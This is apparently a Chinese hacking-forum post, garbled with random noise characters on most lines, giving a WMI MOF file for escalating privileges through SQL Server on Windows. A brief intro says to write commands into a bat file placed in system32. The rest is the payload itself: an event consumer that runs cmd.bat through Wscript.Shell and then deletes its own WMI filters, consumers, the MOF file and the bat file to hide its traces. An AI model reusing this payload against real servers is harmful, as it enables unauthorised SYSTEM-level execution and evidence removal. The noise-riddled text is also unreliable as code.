这个sql提权MOF需要运行 system下的文件,不能定义路径。4 [. _3 `1 X. g U: ?
需要将要运行的命令写入到bat上传到system32目录,然后执行。
/ P8 D, z! q3 L/ b( n
* `7 @1 g# s& P$ m& {这个sql提权MOF需要运行 system下的文件,不能定义路径。+ h* t1 J, ~0 k0 ^/ b, n' w
需要将要运行的命令写入到bat上传到system32目录,然后执行。
; a& c5 J7 K0 |* H/ |+ S% ^+ H; N
* F0 L; V! o: X4 V) `# @' ?#pragma) B$ W/ F; S' w2 a5 E) y
namespace("\\\\.\\root\\cimv2")& L7 b2 F+ c \( @& d
class2 A3 X& [+ {6 N
MyClass547
- V! v: Q3 R4 v. B4 D { [key]
( k: B: ^# W4 H7 n, Q- I! n string( X9 Q, M# h P3 _0 v* w
Name;6 Q- D* H: _1 i+ p; T' n
};
# J1 @; d3 H' I4 Y; l class
0 @' A) N! O3 `6 d! |9 o ActiveScriptEventConsumer, b$ I* c0 c( F
: __EventConsumer { [key]# n) g* |" R. W
string
" f. `& x/ d/ f& k. z Name; [not_null]
/ C7 j8 W; _6 c! W$ l string
6 E% i0 g( m$ w1 [" X, i ScriptingEngine; string7 p1 o. m6 [# F7 o
ScriptFileName; [template]0 k% F9 d6 X* J8 R; n" F) Y$ a
string. I: v% b, K0 H& J# ]! \8 w3 {' j
ScriptText; uint32 KillTimeout;
F9 D( ~2 u k) G) \* U) G9 P u }; instance of __Win32Provider as $P {0 W4 s: o, t t, F, E0 g( n: e
Name
) W/ T) S5 K: A =# `( n! K$ i) e, ?$ Y8 a- K2 k
"ActiveScriptEventConsumer"; CLSID =
T3 ^5 G8 i# K2 O "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
$ o- b X! t# F- b! K3 s PerUserInitialization2 Z& Q. b X: F
= TRUE;
% g) U, z1 d- O% c" l }; instance of __EventConsumerProviderRegistration { Provider: i0 M( h Z" B
= $P; ConsumerClassNames; D) O- i' G* k& F% G: J
=
- _" }" B0 l) }9 x7 C: s {"ActiveScriptEventConsumer"};
1 e4 C [# Z8 O! [. F };% r1 h/ `, l8 {5 D1 m& |$ y5 c" N
Instance of ActiveScriptEventConsumer
& j. H& U" P" j- a. ` as $cons { Name. n; t4 l' Z/ ~; t: k0 s$ e
=
. c" J' U" k* E "ASEC"; ScriptingEngine
+ t' \2 [! ?0 X* O- J/ S; u =9 n: Z# R1 t h6 W0 P/ L7 r
"JScript"; ScriptText
2 Q6 B3 j* j5 ]) d, F1 M =; b) z" x7 `7 L+ F
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
. T' {/ C& s$ E8 f& ~( d# g8 u# n Instance of ActiveScriptEventConsumer S* F. F' v3 r" C: ]
as $cons2 { Name
) c4 ?9 _5 q; z2 M; m =# A l1 Z) g# M3 P0 ~" b5 V
"qndASEC"; ScriptingEngine
1 Z X; W: c' G8 ?7 k =
$ i* U$ g3 B6 c/ q- B9 s% A' p "JScript"; ScriptText8 j3 d: p0 l, C5 n7 Y
=& V! |# r( b8 M
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";7 n6 w( F! ^! Y: ]! N5 J
}; instance of __EventFilter as $Filt { Name, Q4 `, N: @0 k! a) |! v
=5 @; ^$ g- {3 d3 ?
"instfilt"; Query. o; Y( c+ g% V- g+ j
=
# G6 W( H F/ q$ k' y% f "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
" K- u3 V- Y2 k! x =; h7 Y, m. L: U+ u! p( z
"WQL"; }; instance of __EventFilter as $Filt2 { Name
( V( I4 @4 |, B7 s =& C# Q8 U* l L6 o& f: \: W! T8 M
"qndfilt"; Query
! d p: Z# L+ J$ v5 P1 w =
7 Q+ e9 a% q' c6 U6 l2 h "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage4 v& w+ {) [- Q& Z% C# H
=) n# y- S/ Z# S4 B; Q- ?
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer+ _# _7 G& c7 W R6 o
= $cons; Filter
0 h- x9 _5 g+ J2 U = $Filt;
3 i& H2 V i/ O, t7 s }; instance of __FilterToConsumerBinding as $bind2 { Consumer$ a1 z* e( t; W( F- u0 t, @
= $cons2; Filter
/ F$ b. r$ N. [; C0 z3 B6 p% m; T = $Filt2;8 L! E& L& Y* T+ A
}; instance of MyClass547
" d) M U5 j9 d' r: ^ as $MyClass { Name3 f9 o# j6 l" a' ?) \
=
- P6 u7 { ~, B. L* J9 n "ClassConsumer";
`1 l' s8 e( m }; |